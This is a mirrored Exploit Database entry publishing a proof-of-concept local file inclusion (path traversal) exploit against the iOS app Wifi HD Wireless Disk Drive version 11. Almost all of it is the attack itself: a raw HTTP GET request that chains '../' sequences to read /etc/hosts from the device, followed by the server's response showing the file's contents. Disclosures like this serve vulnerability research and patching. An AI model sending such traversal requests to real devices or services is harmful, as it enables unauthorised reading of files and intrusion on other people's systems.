Wifi HD Wireless Disk Drive 11 – Local File Inclusion

• Exploit Database
• 19 阅读

• 作者： Chokri Hammedi
  日期： 2022-09-21
• 类别：

  • remote
  平台：

  • ios
• 来源：https://www.exploit-db.com/exploits/51015/

• # Exploit Title: Wifi HD Wireless Disk Drive 11 - Local File Inclusion
  # Date: Aug 13, 2022
  # Exploit Author: Chokri Hammedi
  # Vendor Homepage: http://www.savysoda.com
  # Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/id311170976
  # Version: 11
  # Tested on: iPhone OS 15_5
  
  # Proof of Concept
  GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
  Host: 192.168.1.100
  Connection: close
  Upgrade-Insecure-Requests: 1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X)
  AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5Safari/604.1
  Referer: http://192.168.1.103/
  Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
  Accept-Encoding: gzip, deflate
  
  
  -----------------
  
  HTTP/1.1 200 OK
  Content-Disposition: attachment
  Content-Type: application/download
  Content-Length: 213
  Accept-Ranges: bytes
  Date: Sat, 13 Aug 2022 03:33:30 GMT
  
  ##
  # Host Database
  #
  # localhost is used to configure the loopback interface
  # when the system is booting.Do not change this entry.
  ##
  127.0.0.1 localhost
  255.255.255.255 broadcasthost
  ::1 localhost